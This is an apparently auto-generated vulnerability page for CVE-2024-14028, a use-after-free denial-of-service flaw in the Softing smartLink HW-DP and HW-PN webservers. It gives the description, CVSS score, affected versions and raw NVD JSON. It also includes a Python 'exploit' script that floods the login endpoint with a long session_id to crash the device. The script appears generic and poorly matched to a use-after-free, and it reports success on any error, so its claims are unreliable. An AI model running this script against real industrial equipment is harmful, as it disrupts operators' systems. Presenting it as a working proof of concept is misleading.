Security Vulnerability Report
中文
CVE-2024-14028 CVSS 6.5 MEDIUM

CVE-2024-14028

Published: 2026-03-27 06:16:36
Last Modified: 2026-03-30 13:26:30
Source: 10de8ef9-5c89-4b17-8228-e97b74acf4bd

Description

Use after free vulnerability in Softing smartLink HW-DP or smartLink HW-PN webserver allows HTTP DoS. This issue affects: smartLink HW-DP: through 1.31 smartLink HW-PN: before 1.02.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

smartLink HW-DP <= 1.31
smartLink HW-PN < 1.02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2024-14028 PoC - HTTP DoS via Use After Free # Target: Softing smartLink HW-DP <= 1.31 or HW-PN < 1.02 def exploit(target_url): """ Send crafted HTTP request to trigger Use After Free vulnerability """ headers = { 'User-Agent': 'Mozilla/5.0', 'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'keep-alive' } # Crafted payload that triggers the vulnerability payload = { 'action': 'logout', 'session_id': 'AAAAAAAA' * 100 # Long string to trigger memory corruption } try: response = requests.post(target_url, headers=headers, data=payload, timeout=10) if response.status_code == 500 or not response: print("[+] Exploit successful! Web service may be unavailable.") else: print("[-] Exploit may have failed or target is patched.") except Exception as e: print(f"[+] Target appears to be down: {e}") if __name__ == "__main__": target = "http://TARGET_IP:PORT/login" exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-14028", "sourceIdentifier": "10de8ef9-5c89-4b17-8228-e97b74acf4bd", "published": "2026-03-27T06:16:35.863", "lastModified": "2026-03-30T13:26:29.793", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free vulnerability in Softing smartLink HW-DP or smartLink HW-PN webserver allows HTTP DoS.\nThis issue affects:\nsmartLink HW-DP: through 1.31\nsmartLink HW-PN: before 1.02."}], "metrics": {"cvssMetricV31": [{"source": "10de8ef9-5c89-4b17-8228-e97b74acf4bd", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "10de8ef9-5c89-4b17-8228-e97b74acf4bd", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://industrial.softing.com/fileadmin/psirt/downloads/2024/CVE-2024-14028.html", "source": "10de8ef9-5c89-4b17-8228-e97b74acf4bd"}, {"url": "https://industrial.softing.com/fileadmin/psirt/downloads/2024/CVE-2024-14028.json", "source": "10de8ef9-5c89-4b17-8228-e97b74acf4bd"}]}}